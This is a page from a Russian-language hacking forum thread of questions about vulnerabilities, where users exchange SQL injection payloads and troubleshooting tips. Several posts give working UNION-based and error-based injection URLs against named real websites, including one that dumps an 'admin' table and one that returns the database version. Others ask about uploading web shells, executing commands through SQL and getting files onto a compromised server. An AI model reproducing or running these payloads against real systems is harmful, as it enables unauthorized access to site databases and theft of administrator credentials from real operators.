Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Darren!
    Code:
    _http://www.zckc.com.tw/products-cont.php?Key=-11+union+select+2,3,4,5,6,admin.*,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+admin--+
    Code:
    _http://www.zckc.com.tw/products-cont.php?Key=-11+union+select+2,3,4,5,6,7,admin.*,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+admin--+
    Ы_Ы
     
    #12021 Strilo4ka, 28 Mar 2010
    Last edited: 28 Mar 2010
  2. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Почему может быть так:

    xxxx.com/order.php?id=49%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20--&lid=2&mnID=12&pageNum_getCategoryProducts=1

    при 24 пишет что неправильное кол-во столбцов
    а при 25 You have an error in your SQL syntax; check the manual that corresponds for the right syntax to use near 'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -' at line 9


    т.е. столбцов 25,но страницу же мне не выводит для вывода


    пробую писать без хвоста, т.е. просто
    xxxx.com/order.php?id=49%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20--

    тогда вообще выводит обычную страницу даже при постановке id=49'
    Как быть?
     
    #12022 Darren, 28 Mar 2010
    Last edited: 28 Mar 2010
  3. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Вопрос №5 Подбираю столбцы ордером пишет(допустим) 2, делаю запрос union+select+1,2 ничего не выводит (выводит ошибку)
    Первое что нужно сделать в этом случае. проверить версию базы, например так:
    site.com/index.php?id=1+and+substring(version(),1,1)=3
    site.com/index.php?id=1+and+substring(version(),1,1)=4
    site.com/index.php?id=1+and+substring(version(),1,1)=5

    Если оказалось, что версия третья, то неудивительно. что вывода нет, оператор union введён с четвётой версии mysql. B этом случае читаем статьи по проведению инъекций в 3 ветке

    Если версия >=4 . или мы видим ошибку different number of columns это вовсе не означает, что вывода не будет.
    Вероятность найти вывод всё равно остаётся. По этой теме идём читать сюда:
    different number of columns
    с поста 79 и вниз со всеми комментариями
     
    1 person likes this.
  4. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    понял
     
    #12024 Darren, 28 Mar 2010
    Last edited: 28 Mar 2010
  5. Life7

    Life7 Banned

    Joined:
    14 Jun 2009
    Messages:
    150
    Likes Received:
    54
    Reputations:
    0
    Ну может у кого есть уже залитый шелл и не жалко показать
     
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    что?
     
  7. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Залитый шелл :)
     
  8. гаррет-тень

    Joined:
    21 Dec 2009
    Messages:
    67
    Likes Received:
    2
    Reputations:
    0
    помогите со скриптом для перехвата пост запроса))
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.cggeorgallis.com/products.php?cid=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+products+group+by+2+limit+1)a)--+&lid=2&mnID=12&pageNum_getCategoryProducts=1
    
    4.1.22-standard-log
     
  10. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    подскажите как с помощью curl файл на сервер залить ?
     
  11. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    если ты о пхп -
    , если ты о качалке -
    но если лень, тогда
     
  12. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    он говорит об аплоаде на сервер по http, наверное
     
  13. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Как через sql инъекцию выполнить команду, и просмотреть phpinfo ? Допустим при таком запросе: http://site.ru/index.php?id=-1+union+select+1,2,3-- принтабельный столбец 2.
     
  14. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Code:
    http://site.ru/index.php?id=-1+union+select+1,column_name,3+from+information_schema.columns+where+table_name='phpinfo'+--+
    Если я правильно понял :).
     
    4 people like this.
  15. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    CyberHunter, спасибо. А так же можно выполнять любой пхп код?
     
  16. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Насколько я знаю, - нет. Для этого надо найти админку.
     
  17. Serafim

    Serafim Elder - Старейшина

    Joined:
    24 Oct 2006
    Messages:
    181
    Likes Received:
    103
    Reputations:
    18
    Есть права модера и vbulletin 4.0.2 , пробовал все способы со старых версий- не работают.
    Жду предложений.
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    o_O WTF ????
    Убедительная просьба, если не понимаешь о чём речь, не нужно советов. Судя по твоим постам, просто - не нужно советов!

    a1ertso
    Никак в мускуле не выполнить комманду.
    Продвинутые базы позволяют выполнять, но не php код, а системные комманды, как зависит от оси и базы, но в 99% случаев это сделать не удастся из-за прав.
     
  19. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Ну MySQL тоже можно внести в список этих продвинутых баз =)
    Вспомни sql-бэкдор под Win.
     
  20. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    хм...как можно на сервер загрузить файл, если при использовании wget и curl пишется premission denied, на на get и fetch - command not found ? есть еще способы ?
     
Thread Status:
Not open for further replies.